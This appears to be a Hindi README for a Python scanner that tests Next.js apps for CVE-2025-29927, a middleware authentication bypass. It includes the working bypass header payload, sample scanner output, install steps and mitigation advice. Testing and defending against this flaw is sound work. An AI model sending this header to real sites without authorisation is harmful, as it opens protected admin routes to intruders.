
🔐 CVE-2025-29927 के लिए पायथन-आधारित स्मार्ट स्कैनर — Next.js मिडलवेयर प्रमाणीकरण बाईपास भेद्यता। मेटा रीफ्रेश, कीवर्ड-आधारित रीडायरेक्ट और अधिक का पता लगाता है।
यह Python-आधारित स्मार्ट स्कैनर CVE-2025-29927 भेद्यता का पता लगाने में मदद करता है Next.js अनुप्रयोगों में — एक महत्वपूर्ण मिडलवेयर बाइपास जो हमलावरों को एक तैयार HTTP हेडर का उपयोग करके प्रमाणीकरण को छोड़ने की अनुमति देता है।
🧠 यह उपकरण न केवल HTTP रीडायरेक्ट बल्कि क्लाइंट-साइड रीडायरेक्शन तंत्र जैसे
<meta http-equiv="refresh">, कीवर्ड-आधारित लॉगिन रीडायरेक्ट, और साइलेंट ऑथ बाइपास की भी पहचान करता है।
x-middleware-subrequest बाइपास हेडर<meta refresh> आधारित रीडायरेक्टlogin, sign in, authentication जैसे कीवर्ड वाली HTML सामग्री$ python3 CVE-2025-29927.py
🌐 Enter the target site URL (e.g. http://localhost:3000): http://vulnerable.local
📁 Enter the protected path (e.g. /dashboard): /admin
→ Testing with header: middleware:middleware:middleware:middleware:middleware
↳ HTTP Status: 200
↳ Redirect detected: No
✅ VULNERABLE! Bypass successful with header:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Main interactive scanner
├── requirements.txt # Python dependencies
└── README.md # This file
requests
beautifulsoup4
colorama
यदि आपका ऐप प्रभावित है, तो निम्न कार्य करें:
v15.2.3 या बाद के संस्करण पर (या 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 हमलावरों को x-middleware-subrequest हेडर में तैयार मानों का हेरफेर करके Next.js मिडलवेयर जाँच को बायपास करने की अनुमति देता है, जैसे:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
कमजोर संस्करणों में, यह मिडलवेयर निष्पादन को पूरी तरह से अक्षम कर देता है — जिससे /dashboard, /admin आदि जैसे संरक्षित रूट तक सीधी पहुँच मिलती है।
द्वारा अनुरक्षित: @mrzblackhat
सुझावों, सुधारों या योगदान के लिए मुझसे Telegram पर संपर्क करने में संकोच न करें।
next.js CVE-2025-29927 बग बाउंटी मिडलवेयर बाइपास प्रमाणीकरण वेब सुरक्षा पायथन सुरक्षा स्कैनर नैतिक हैकिंग
यह उपकरण केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। जिम्मेदारी से उपयोग करें।